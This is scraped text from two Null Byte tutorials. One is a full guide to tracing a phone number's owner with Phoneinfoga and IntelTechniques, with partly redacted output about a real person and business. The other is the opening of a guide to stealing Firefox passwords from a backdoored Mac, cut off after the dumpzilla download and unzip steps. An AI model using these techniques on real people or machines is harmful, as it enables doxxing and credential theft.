newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo by Justin Meyers/Null Byte; Screenshots by Macro Mosaic/Null ByteRelatedNews:Comparing the Best International Data Plans from All Major US CarriersSPLOIT:How to Make a Proxy Server in PythonTor for Android:How to Stay Anonymous on Your PhoneHow To:Tutanota for Android, iOS, & Web Keeps Your Emails Private with End-to-End EncryptionHow To:Hide Your IP Address with a Proxy ServerInstagram 101:How to Download a Backup of Your Account to Save Photos, Comments & MoreHow To:No Data, No Problemβ€”Use SMS to Connect to Your Favorite Web Services on AndroidHow To:Enable MMS iPhone 3G with T-MobileHow To:Easily View Your Current Cellular Data Usage on Your iPhoneNews:Reality of VPNs, Proxies, and TorAnonymous Texting 101:How to Block Your Cell Phone Number While Sending Text MessagesHow To:Use Snapchat from Your MacHow To:Enable MMS for iPhone 3GHow To:FaceTime Forcing LTE Instead of Wi-Fi? Here's How to Fix ItNews:Save Money with These Awesome Freebies from Your Cellular ProviderHow To:Forward Missed Call Alerts & Text Messages on Your Samsung Galaxy S3 to an Email AddressHow To:Track Your Own Mobile Data Usage on iPhone or AndroidHow To:Recover WhatsApp Photos & Videos Deleted from Your Phone's StorageHow To:Remotely View & Send Text Messages from Your Android Phone Using Any Web BrowserHow To:Find Out What Personal Data Your Mobile Apps Are Leaking with MobilescopeHow To:Communicate Offline β€” No Wi-Fi, Cell Reception, or Mobile Data NeededHow To:Use Gmail's New Confidential Mode to Send Private, Self-Destructing Emails from Your PhoneHow To:Facebook Credentials RevisitedHow To:Block Ads in Games on Your iPhone for Distraction-Free GameplayNews:Netflix Is Finally Going to Offer High-Quality Streaming on AT&T & VerizonHow To:Your iPhone's Using More Data Than It Needs, but This Could Stop ItHow To:Set Up Google Fi on Your iPhoneHow To:Let Friends & Family Know Where You Are Automatically with a Secret Text CodeHow To:Find Out if Your Wireless Carrier Is Tracking You on AndroidHow To:10 Ways to Trick Your Android Phone into Using Less DataNews:T-Mobile Announces Free Music Streaming, New "Test Drive" ProgramHow To:Code a Basic TCP/IP Client & Server Duo in PythonHow To:Send SMS Messages with PythonHow To:Chain Proxies to Mask Your IP Address and Remain Anonymous on the WebNews:Security Flaw in HTC Smartphones Leaks Your Personal Data to Certain Android AppsHow To:Get By with the Cheaper 16GB Option for iPhone or iPadNews:Anonymity, Darknets and Staying Out of Federal Custody, Part Two: Onions and DaggersHow To:Spy on Your "Buddy's" Network Traffic: An Intro to Wireshark and the OSI ModelNews:Finding Hidden Metadata in Images (Oh, the Possibilities)How To:Use Tortunnel to Quickly Encrypt Internet Traffic
How to Find Identifying Information from a Phone Number Using OSINT Tools Β« Null Byte :: WonderHowTo
Phone numbers often contain clues to the owner's identity and can bring up a lot of data during an OSINT investigation. Starting with a phone number, we can search through a large number of online databases with only a few clicks to discover information about a phone number. It can include the carrier, the owner's name and address, and even connected online accounts.While a phone number may not seem like much information to give out, an OSINT researcher can quickly discover information that ties a phone number to a variety of other clues. The data can be used to detect whether a phone number is a throwaway VoIP number used to hide the owner's identity or a cell phone belonging to a real person. In the event of buying something online or replying to an apartment ad, this information is incredibly useful to know.For a hacker, the ability to turn a phone number into multiple connected online accounts, email addresses, or screen names makes it a perfect starting point for bigger things to come. A quick scan to discover the carrier of a phone number can provide everything a hacker needs for a well-crafted phishing email pretending to be from the victim's carrier. Once a hacker can identify other details about the target that may be attached to the phone number, it's easy to identify the weakest link and attack the target using whatever information that's dug up.Don't Miss:Use Facial Recognition for OSINT on Individuals & CompaniesEditor's note: The OSINT Tools by Mike Bazzel featured in this article wastaken downfrom his website due to increased DDoS-style attacks, as well as DMCAs and cease-and-desists from some of the tools included. Phoneinfoga will still work in this guide, but for the others, you can try using each company's individual tool instead. You can see how it used to work, however, in the video and text below.OSINT Tools for Phone NumbersFor quickly searching through phone numbers, we can use both command-line and browser-based tools. Command line tools give the advantage of simple operation and greater customization but require you to have Python installed and updated. Today, we'll beusing a tool called Phoneinfogato quickly determine if the number is associated with a disposable phone number.___ _ _____ __ / _ \ |__ ___ _ __ ___ \_ \_ __ / _| ___ __ _ __ _ / /_)/ '_ \ / _ \| '_ \ / _ \ / /\/ '_ \| |_ / _ \ / _` |/ _` | / ___/| | | | (_) | | | | __/\/ /_ | | | | _| (_) | (_| | (_| | \/ |_| |_|\___/|_| |_|\___\____/ |_| |_|_| \___/ \__, |\__,_| |___/ PhoneInfoga Ver. v1.6.4 Coded by SundowndevOne of the best resources for OSINT is Mike Bazzel'sIntelTechniqueswebsite, which we'll also be focusing on here. This website contains several custom tools that Bazzel had organized to be useful for researchers. Many of these tools are already inBuscador OS, a virtual machine that can be run to provide an operating system geared towards OSINT investigations.Don't Miss:Use the Buscador OSINT VM for Conducting Online InvestigationsThe ScenarioAs an example, we'll take a sample business listing from a classified ad. How would we verify this? If the ad claims to be from a licensed professional, could we track down a license attached to the phone number? A simple reverse phone number lookup may find something, but to see the real data, you have to dig deeper and utilize more than just one reverse number lookup tool.Step 1: Install PhoneinfogaTo supplement the information you find online later, you can use a Python tool called Phoneinfoga, which allows you to search for details about phone numbers from the command line. To use Phoneinfoga, open a terminal window and enter the following four commands one by one or at the same time.~$ git clone https://github.com/sundowndev/PhoneInfoga ~$ cd PhoneInfoga/ ~/PhoneInfoga$ python3 -m pip install -r requirements.txt ~/PhoneInfoga$ cp config.example.py config.py Cloning into 'PhoneInfoga'... remote: Enumerating objects: 85, done. remote: Counting objects: 100% (85/85), done. remote: Compressing objects: 100% (79/79), done. remote: Total 886 (delta 43), reused 12 (delta 6), pack-reused 801 Receiving objects: 100% (886/886), 247.47 KiB | 550.00 KiB/s, done. Resolving deltas: 100% (461/461), done. Requirement already satisfied: requests==2.21.0 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 1)) (2.21.0) Collecting bs4==0.0.1 (from -r requirements.txt (line 2)) Downloading https://files.pythonhosted.org/packages/10/ed/7e8b97591f6f456174139ec089c769f89a94a1a4025fe967691de971f314/bs4-0.0.1.tar.gz Requirement already satisfied: html5lib==1.0.1 in /usr/lib/python3/dist-packages (from -r requirements.txt (line 3)) (1.0.1) Collecting phonenumbers==8.10.2 (from -r requirements.txt (line 4)) Downloading https://files.pythonhosted.org/packages/d9/62/a176cfaf6edb90b68ae3426cf4fb8fd98189df550e2143cafc66bb2c1b82/phonenumbers-8.10.2-py2.py3-none-any.whl (3.2MB) 100% |β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 3.2MB 381kB/s Collecting argparse==1.2.1 (from -r requirements.txt (line 5)) Downloading https://files.pythonhosted.org/packages/6f/ad/86448942ad49c5fe05bfdf7ebc874807f521dfcca5ee543afaca2974ad5a/argparse-1.2.1.tar.gz (69kB) 100% |β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 71kB 5.8MB/s Collecting urllib3==1.24.2 (from -r requirements.txt (line 6)) Downloading https://files.pythonhosted.org/packages/df/1c/59cca3abf96f991f2ec3131a4ffe72ae3d9ea1f5894abe8a9c5e3c77cfee/urllib3-1.24.2-py2.py3-none-any.whl (131kB) 100% |β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 133kB 7.4MB/s Collecting colorama==0.4.1 (from -r requirements.txt (line 7)) Downloading https://files.pythonhosted.org/packages/4f/a6/728666f39bfff1719fc94c481890b2106837da9318031f71a8424b662e12/colorama-0.4.1-py2.py3-none-any.whl Requirement already satisfied: beautifulsoup4 in /usr/lib/python3/dist-packages (from bs4==0.0.1->-r requirements.txt (line 2)) (4.7.1) Building wheels for collected packages: bs4, argparse Running setup.py bdist_wheel for bs4 ... done Stored in directory: /root/.cache/pip/wheels/a0/b0/b2/4f80b9456b87abedbc0bf2d52235414c3467d8889be38dd472 Running setup.py bdist_wheel for argparse ... done Stored in directory: /root/.cache/pip/wheels/30/35/38/aa7be52cca01ed539bd6f3789edb8489691cc7d9a010cbc982 Successfully built bs4 argparse Installing collected packages: bs4, phonenumbers, argparse, urllib3, colorama Found existing installation: urllib3 1.24.1 Not uninstalling urllib3 at /usr/lib/python3/dist-packages, outside environment /usr Can't uninstall 'urllib3'. No files were found to uninstall. Found existing installation: colorama 0.3.7 Not uninstalling colorama at /usr/lib/python3/dist-packages, outside environment /usr Can't uninstall 'colorama'. No files were found to uninstall. Successfully installed argparse-1.2.1 bs4-0.0.1 colorama-0.4.1 phonenumbers-8.10.2 urllib3-1.24.2Next, you can run the program with the options displayed in the help file.~/PhoneInfoga$ python3 phoneinfoga.py -h usage: phoneinfoga.py -n <number> [options] Advanced information gathering tool for phone numbers (https://github.com/sundowndev/PhoneInfoga) version v1.6.4 optional arguments: -h, --help show this help message and exit -n number, --number number The phone number to scan (E164 or international format) -i input_file, --input input_file Phone number list to scan (one per line) -o output_file, --output output_file Output to save scan results -s scanner, --scanner scanner The scanner to use --recon Launch custom format reconnaissance --no-ansi Disable colored output -v, --version Show tool versionStep 2: Search a Phone Number with PhoneinfogaTo search for a phone number, we just need to add the-nflag and then whatever number we want to search for. If you use the--reconargument, it will perform an advanced search.~/PhoneInfoga$ python3 phoneinfoga.py -n 1717β–ˆβ–ˆβ–ˆ9539 --recon ___ _ _____ __ / _ \ |__ ___ _ __ ___ \_ \_ __ / _| ___ __ _ __ _ / /_)/ '_ \ / _ \| '_ \ / _ \ / /\/ '_ \| |_ / _ \ / _` |/ _` | / ___/| | | | (_) | | | | __/\/ /_ | | | | _| (_) | (_| | (_| | \/ |_| |_|\___/|_| |_|\___\____/ |_| |_|_| \___/ \__, |\__,_| |___/ PhoneInfoga Ver. v1.6.4 Coded by Sundowndev [!] ---- Fetching informations for 1717β–ˆβ–ˆβ–ˆ9539 ---- [!] [*] Running local scan... [+] International format: +1 717-β–ˆβ–ˆβ–ˆ-9539 [+] Local format: 717β–ˆβ–ˆβ–ˆ9539 [+] Country found: United States (+1) [+] City/Area: Pennsylvania [+] Carrier: [+] Timezone: America/New_York [i] The number is valid and possible. [*] Running Numverify.com scan... [!] Numverify.com is not available [*] Running OVH scan... [*] Running custom format reconnaissance... Footprint reconnaissance for 717β–ˆβ–ˆβ–ˆ9539 [+] URL: https://www.reverse-lookup.co/717-β–ˆβ–ˆβ–ˆ-9539 [+] URL: http://staging.thatsthem.com/phone/717-β–ˆβ–ˆβ–ˆ-9539 [+] URL: https://www.revealname.com/717-β–ˆβ–ˆβ–ˆ-9539 [+] URL: https://www.okcaller.com/717β–ˆβ–ˆβ–ˆ9586 [+] URL: http://www.ncsusigmanu.com/g-i/717/ig/β–ˆβ–ˆβ–ˆ/9 Footprint reconnaissance for 1 717β–ˆβ–ˆβ–ˆ9539 Footprint reconnaissance for 1 717 β–ˆβ–ˆβ–ˆ9539 Footprint reconnaissance for 717 β–ˆβ–ˆβ–ˆ9539 [+] URL: http://phonelookupus.com/who-called-me/1/432β–ˆβ–ˆβ–ˆ1704 Footprint reconnaissance for 717-β–ˆβ–ˆβ–ˆ9539 [+] URL: http://phonelookupus.com/who-called-me/1/432β–ˆβ–ˆβ–ˆ1704 Footprint reconnaissance for 717-β–ˆβ–ˆβ–ˆ-9539 [+] URL: http://www.buzzfile.com/business/Rauch-β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ-β–ˆβ–ˆβ–ˆ-β–ˆβ–ˆ-β–ˆβ–ˆ-β–ˆβ–ˆβ–ˆβ–ˆ [+] URL: https://www.whitepages.com/phone/1-717-β–ˆβ–ˆβ–ˆ-9539 [+] URL: https://safer.fmcsa.dot.gov/query.asp?query_type=queryCarrierSnapshot&query_param=USDOT&query_string=1β–ˆβ–ˆβ–ˆ367 [+] URL: https://www.manta.com/c/mtmr6yw/rauch-β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ-β–ˆβ–ˆβ–ˆ [+] URL: https://www.kw.com/kw/agent/β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆrauch Footprint reconnaissance for +1 717-β–ˆβ–ˆβ–ˆ-9539 [+] URL: https://phonescheck.com/717-β–ˆβ–ˆβ–ˆ [+] URL: https://mobphonescheck.com/717-β–ˆβ–ˆβ–ˆ [+] URL: http://uk.popularphotolook.com/717-β–ˆβ–ˆβ–ˆ-95 [+] URL: https://ownertelephone.com/1717β–ˆβ–ˆβ–ˆ7777 [+] URL: http://opencallerlistings.com/listing/717-β–ˆβ–ˆβ–ˆ-95 Footprint reconnaissance for (+1)717-β–ˆβ–ˆβ–ˆ-9539 [+] URL: https://www.whitepages.com/phone/1-717-β–ˆβ–ˆβ–ˆ-9539 [+] URL: https://www.whitepages.com/phone/1-717-β–ˆβ–ˆβ–ˆ-9XXX [+] URL: https://www.whitepages.ca/phone/1-717-β–ˆβ–ˆβ–ˆ-9538 [+] URL: http://www.google.comhttp://mrnumber.com/1-717-β–ˆβ–ˆβ–ˆ%3Fpage%3D4%26thousand%3D9 [+] URL: http://www.google.comhttp://uk.popularphotolook.com/717-β–ˆβ–ˆβ–ˆ-95 Footprint reconnaissance for +1/717-β–ˆβ–ˆβ–ˆ-9539 [+] URL: https://www.whitepages.com/phone/1-717-β–ˆβ–ˆβ–ˆ-9539 [+] URL: https://www.whitepages.com/phone/1-717-β–ˆβ–ˆβ–ˆ-95XX [+] URL: https://www.whitepages.ca/phone/1-717-β–ˆβ–ˆβ–ˆ-9538 [+] URL: http://mrnumber.com/1-717-β–ˆβ–ˆβ–ˆ%3Fpage%3D4%26thousand%3D9 [+] URL: http://uk.popularphotolook.com/717-β–ˆβ–ˆβ–ˆ-95 Footprint reconnaissance for (717) β–ˆβ–ˆβ–ˆ9539 [+] URL: http://phonelookupus.com/who-called-me/1/432β–ˆβ–ˆβ–ˆ1704 Footprint reconnaissance for (717) β–ˆβ–ˆβ–ˆ-9539 [+] URL: http://www.buzzfile.com/business/Rauch-β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ-β–ˆβ–ˆβ–ˆ-β–ˆβ–ˆ-β–ˆβ–ˆ-β–ˆβ–ˆβ–ˆβ–ˆ [+] URL: https://www.whitepages.com/phone/1-717-β–ˆβ–ˆβ–ˆ-9539 [+] URL: https://safer.fmcsa.dot.gov/query.asp?query_type=queryCarrierSnapshot&query_param=USDOT&query_string=1β–ˆβ–ˆβ–ˆ367 [+] URL: https://www.manta.com/c/mtmr6yw/rauch-β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ-β–ˆβ–ˆβ–ˆ [+] URL: https://www.kw.com/kw/agent/β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆrauch Footprint reconnaissance for (717) β–ˆβ–ˆβ–ˆ.9539 Footprint reconnaissance for (717)β–ˆβ–ˆβ–ˆ9539 [+] URL: http://phonelookupus.com/who-called-me/1/432β–ˆβ–ˆβ–ˆ1704 Footprint reconnaissance for (717)β–ˆβ–ˆβ–ˆ-9539 [+] URL: http://www.buzzfile.com/business/Rauch-β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ-β–ˆβ–ˆβ–ˆ-β–ˆβ–ˆ-β–ˆβ–ˆ-β–ˆβ–ˆβ–ˆβ–ˆ [+] URL: https://www.whitepages.com/phone/1-717-β–ˆβ–ˆβ–ˆ-9539 [+] URL: https://safer.fmcsa.dot.gov/query.asp%3Fquery_type%3DqueryCarrierSnapshot%26query_param%3DUSDOT%26query_string%3D1β–ˆβ–ˆβ–ˆ367 [+] URL: https://www.manta.com/c/mtmr6yw/rauch-β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ-β–ˆβ–ˆβ–ˆ [+] URL: https://www.kw.com/kw/agent/β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆrauch Footprint reconnaissance for (717)β–ˆβ–ˆβ–ˆ.9539 [*] Running OSINT footprint reconnaissance... [i] Generating scan URL on 411.com... [+] Scan URL: https://www.411.com/phone/1-717-β–ˆβ–ˆβ–ˆ-9539Would you like to use an additional format for this number ? (y/N) n [i] ---- Web pages footprints ---- [i] Searching for footprints on web pages... (limit=10) [+] Result found: https://www.reverse-lookup.co/717-β–ˆβ–ˆβ–ˆ-9539 [+] Result found: https://www.revealname.com/717-β–ˆβ–ˆβ–ˆ-9539 [+] Result found: https://who-called.biz/state/pennsylvania/phones/1717β–ˆβ–ˆβ–ˆ0000 [+] Result found: http://v-postal-cn.com/phones/note_17172780000_1717β–ˆβ–ˆβ–ˆ9999_all2.htm [+] Result found: http://www.jihaoba.com/haoduan/xiaogan/1717β–ˆβ–ˆβ–ˆ.htm [+] Result found: http://sm.cidu.net/gujialogall.asp?hm=1717β–ˆβ–ˆβ–ˆ [+] Result found: https://review-call.com/1717β–ˆβ–ˆβ–ˆ0000 [+] Result found: https://number-review.com/1717β–ˆβ–ˆβ–ˆ0000 [+] Result found: https://fast-scan.com/1717β–ˆβ–ˆβ–ˆ0000 [i] Searching for documents... (limit=10) [i] ---- Reputation footprints ---- [i] Searching for reputation report on whosenumber.info... [i] Searching for phone fraud footprints... [i] Searching for reputation report on findwhocallsme.com... [i] Searching for reputation report on yellowpages.ca... [i] Searching for reputation report on phonenumbers.ie... [i] Searching for reputation report on who-calledme.com... [i] Searching for reputation report on usphonesearch.net... [i] Searching for reputation report on whocalled.us... [i] Searching for reputation report on quinumero.info... [i] Searching for reputation report on uk.popularphotolook.com... [i] Generating URL on scamcallfighters.com... [+] http://www.scamcallfighters.com/search-phone-1717β–ˆβ–ˆβ–ˆ9539.htmlWould you like to search for temporary number providers footprints ? (Y/n) n [i] ---- Social media footprints ---- [i] Searching for footprints on facebook.com... [i] Searching for footprints on twitter.com... [i] Searching for footprints on linkedin.com... [i] Searching for footprints on instagram.com... [i] ---- Phone books footprints ---- [i] Generating URL on True People... [+] https://www.truepeoplesearch.com/results?phoneno=+1717-β–ˆβ–ˆβ–ˆ-9539 [i] Searching for footprints on numinfo.net... [i] Searching for footprints on sync.me... [i] Searching for footprints on whocallsyou.de... [i] Searching for footprints on pastebin.com... [i] Searching for footprints on whycall.me... [i] Searching for footprints on locatefamily.com... [i] Searching for footprints on spytox.com... Would you like to rerun OSINT scan ? (e.g to use a different format) (y/N) n [i] Scan finished.Sometimes, this tool can get you temporarily blacklisted from Google searches because of the way it's programmed. It's annoyingbut easily resolvedwith a Google abuse exemption, detailed at the end of the video above.Don't Miss:Uncover Hidden Subdomains to Reveal Internal ServicesAs you can see above, there are lots of links to dive into, and right away the name and business associated with the phone number are available in the output.Step 3: Access the IntelTechniques OSINT PortalNow, let's concentrate on the web tools that are free on Bazzel's website since they're a little bit easier to work with than with the command line tool above. To follow along, you can go tointeltechniques.com/menu.html, then click on the "Telephone Number" tab.A submenu appears when you click on "Telephone Number," and you'll need to select the "Telephone Search Tool" to bring up the page that will allow us to search many tools at once.As you can see, it's a healthy mix of people-searching tools, phonebook directories, scam reporting websites, and social media connections. These are free, public resources combined into one easy-to-use search tool, allowing anyone with a browser and internet connection to begin researching who is on the other end of a phone number.We can input a number into each tool one by one, but the easiest way is to enter the number into the field at the top, and click "Populate All."Don't Miss:Use SpiderFoot for OSINT GatheringStep 4: Search a Phone Number on IntelTechniquesIn the search tool, enter the number into the field next to the "Populate All" button, then click the button to auto-populate the number into the rest of the fields. Next, select "Submit All" under the list of services to run all searches on the phone number. All of the services will open up in different tabs or pop-ups with the search already submitted (you may need to allow pop-ups in your browser).Step 5: Search Results for Clues & PatternsNow, check out some of the resources loaded from the search. Here, some of the people searching services have turned our phone number into a name.Along with the person's name is a startling amount of information, the most important of which is a location and address for us to tie together further details. We found a lot of results with the name, making a pretty strong likelihood that this is the person behind our ad. So how would we prove they are a licensed professional?Step 6: Locate Information That Can Be VerifiedOn another search site result, we can see the name of a business associated with the phone number, which is what we're looking for! If we can tie the name of a company and the name we've found associated with the number, we can look up a source we trust, like a state listing of active businesses, to determine whether this is a real business. Here, we have a name, address, and business name; everything we need to verify whether a business exists.Step 7: Verify with Primary Source DataTo check out the information we found, we should look for some primary source information that backs up our discovery. In our case, the best database to search is the Department of State business database for the state we discovered the business in. Here, we were able to pull a valid business listing, one which matches the address we previously found. It appears the person behind the online advertisement is honest β€” they are a licensed professional after all.Phone Numbers Can Tie Everything TogetherAs a starting point, a phone number can provide everything you need to locate information about a target. With tools like Phoneinfoga, you can quickly discover whether a phone number is a throwaway or a legitimate number. If the number is real, the IntelTecniques website tools can piece together clues to build a picture of the person behind the phone number, sometimes quite literally.With the right tools, a single phone number can lead you from clue to clue, piecing together everything you need to learn about a target.I hope you enjoyed this guide to using phone numbers in an OSINT investigation! If you have any questions about this tutorial on phone number recon, or if you have a comment, ask below or feel free to reach me on [email protected]'t Miss:How to Use Maltego to Research & Mine Data Like an AnalystFollow Null Byte onTwitter,Flipboard, andYouTubeSign up forNull Byte's weekly newsletterFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo by Justin Meyers/Null Byte; Screenshots by Kody/Null ByteRelatedHow To:Find OSINT Data on License Plate Numbers with SkiptracerHow To:Use the Buscador OSINT VM for Conducting Online InvestigationsHow To:Use Maltego to Fingerprint an Entire Network Using Only a Domain NameRecon:How to Research a Person or Organization Using the Operative FrameworkHow To:Spot Fake Businesses & Find the Signature of CEOs with OSINTHow To:Use Maltego to Target Company Email Addresses That May Be Vulnerable from Third-Party BreachesVideo:How to Use Maltego to Research & Mine Data Like an AnalystHow To:3 Great Apps for Reverse Phone Number Lookup on AndroidHow To:Scrape Target Email Addresses with TheHarvesterHow To:Use Google Search Operators to Find Elusive InformationHow To:Conduct OSINT Recon on a Target Domain with Raccoon ScannerNews:These Android Phones Could Be Affected by Adups' Chinese SpywareHow To:Obtain Valuable Data from Images Using Exif ExtractorsHow To:Mine Twitter for Targeted Information with TwintHow To:Map Networks & Connect to Discovered Devices Using Your PhoneHow To:Find Passwords in Exposed Log Files with Google DorksHow To:Use Photon Scanner to Scrape Web OSINT DataHow To:Use Facial Recognition to Conduct OSINT Analysis on Individuals & CompaniesHow To:Advanced Penetration Testing - Part 1 (Introduction)How To:Brute-Force SSH, FTP, VNC & More with BruteDumHow To:Track Down a Tinder Profile with Location Spoofing on Google ChromeHow To:Hunt Down Social Media Accounts by Usernames with SherlockNews:WhatsApp Is Now Sharing Your Data with Facebook, but Opting Out Doesn't Solve the ProblemHack Like a Pro:How to Hack Web Apps, Part 5 (Finding Vulnerable WordPress Websites)How To:Probe Websites for Vulnerabilities More Easily with the TIDoS FrameworkHow To:Use SpiderFoot for OSINT GatheringHow To:Conduct Recon on a Web Target with Python ToolsHow To:Top 10 Browser Extensions for Hackers & OSINT ResearchersAndroid for Hackers:How to Scan Websites for Vulnerabilities Using an Android Phone Without RootHow To:Uncover Hidden Subdomains to Reveal Internal Services with CT-ExposerNews:New Tool Makes It Easy to Check if a Phone Was Lost or StolenHow To:Block Spoofed Numbers & Robocalls on Any Phone with Verizon, AT&T, T-Mobile, or SprintHow To:Prevent People Who Have Your Contact Information from Finding Your Instagram AccountHow To:Catch an Internet Catfish with Grabify Tracking LinksHow To:Control Your Android Phone via Your Computer for Easier MultitaskingHow To:Send SMS Messages with PythonNews:References As A Marketing ToolRemove Your Online Identity:The Ultimate Guide to Anonymity and Security on the InternetHow To:Filter Unwanted Calls & SMS for Free with Google VoiceNews:Finding Hidden Metadata in Images (Oh, the Possibilities)
Hacking macOS: How to Dump Passwords Stored in Firefox Browsers Remotely Β« Null Byte :: WonderHowTo
Passwords and data stored in web browsers are extremely valuable to hackers. If not for financial gain, black hat hackers may still leak your passwords and personal information for amusement. Never undervalue what you're worth to a hacker.While I'm definitely no black hat, discovering fun ways to perform post-exploitation attacks from aMacBook backdoorhas been an interesting experience. Thus far, I've been surprised to learn how easy it is toabuse tools built into macOSorinstall third-party softwareto further exploit a Mac computer.Continuing thishacking macOS journey, this time, I'm going to show how hackers can easily exfiltrate sensitive Firefox directories and how to extract the passwords usingdumpzilla, a comprehensive browser forensics tool. While black hats could benefit from this knowledge, white hats, pentesters, and other do-good hackers will as well. Plus, normal everyday Mac users will learn how ordinary practices such as storing passwords in browsers may put them at risk.Don't Miss:How to Configure a Backdoor on Anyone's MacBookReaders should keep in mind, this attack was performed from a low-privileged backdoor (no admin access) against Firefox 60 on macOS 10.13 with the Firewall enabled andAVG antivirusinstalled.Step 1: Install Dumpzilla DependenciesTo start, from the Kali system, install a few packages usingpip. Pip is a package management system used to install and manage Python packages. These packages are required to run dumpzilla. The full command ispip install logging lz4.pip install logging lz4 Collecting logging Downloading https://files.pythonhosted.org/packages/93/4b/979db9e44be09f71e85c9c8cfc42f258adfb7d93ce01deed2788b2948919/logging-0.4.9.6.tar.gz (96kB) 100% |β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 102kB 69kB/s Building wheels for collected packages: logging Running setup.py bdist_wheel for logging ... done Stored in directory: /root/.cache/pip/wheels/7d/2e/cb/a51fbdf351b2efebcf857f8b2c8d59b6ccd44ea2e9bb4005d6 Successfully built logging Installing collected packages: logging Successfully installed logging-0.4.9.6There are more dependencies which I found were easier to install using APT. Enterapt-getinstall python3 sqlite3 python-lz4 libnss3*.apt-get install python3 sqlite3 python-lz4 libnss3* Reading package lists... Done Building dependency tree Reading state information... Done Suggested packages: sqlite3-doc The following NEW packages will be installed: python-lz4 sqlite3 0 upgraded, 2 newly installed, 0 to remove and 274 not upgraded. Need to get 879 kB of archives. After this operation, 2,591 kB of additional disk space will be used. Get:1 https://mirrors.dotsrc.org/kali kali-rolling/main amd64 python-lz4 amd64 0.10.1+dfsg1-0.2 [16.6 kB] Get:2 https://mirrors.dotsrc.org/kali kali-rolling/main amd64 sqlite3 amd64 3.23.1-1 [863 kB] Fetched 879 kB in 15s (60.0 kB/s) Selecting previously unselected package python-lz4. (Reading database ... 181720 files and directories currently installed.) Preparing to unpack .../python-lz4_0.10.1+dfsg1-0.2_amd64.deb ... Unpacking python-lz4 (0.10.1+dfsg1-0.2) ... Selecting previously unselected package sqlite3. Preparing to unpack .../sqlite3_3.23.1-1_amd64.deb ... Unpacking sqlite3 (3.23.1-1) ... Setting up python-lz4 (0.10.1+dfsg1-0.2) ... Setting up sqlite3 (3.23.1-1) ... Processing triggers for man-db (2.8.3-2) ...Step 2: Download DumpzillaWith the required packages installed, it's safe to download dumpzilla.Now, at the time of this writing, there's abug in the latest versionof dumpzilla which results in a failure to automatically decode the passwords saved in Firefox. Fortunately, GitHub keeps ahistory of every versionthat users can access at any time.In future releases of dumpzilla, it should be possible to simply clone the repository and continue following along with this article. For now, readers shoulddownload this version of dumpzillausing the belowwgetcommand. This version was tested and decodes passwords stored in Firefox as expected.Don't Miss:Steal & Decrypt Chrome & Firefox Passwords in Windows 10wget 'https://github.com/Busindre/dumpzilla/archive/b3075d1960874ce82ea76a5be9f58602afb61c39.zip'Step 3: Extract DumpzillaWget will create a new b3075d1960874ce82ea76a5be9f58602afb61c39.zip file. The compressed dumpzilla files within it can be extracted using theunzip b3075d1960874ce82ea76a5be9f58602afb61c39.zipcommand.unzip b3075d1960874ce82ea76a5be9f58602afb61c39.zip Archive: b3075d1960874ce82ea76a5be9f58602afb61c39.zip b3075d1960874ce82ea76a5be9f58602afb61c39 creating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ creating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/ inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/addinfo.json inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/addons.json inflating: dumpzilla-b3075d1960874ce82ea76a5be9f58602afb61c39/ES_templates_dumpzilla/bookmarks.json inflating: 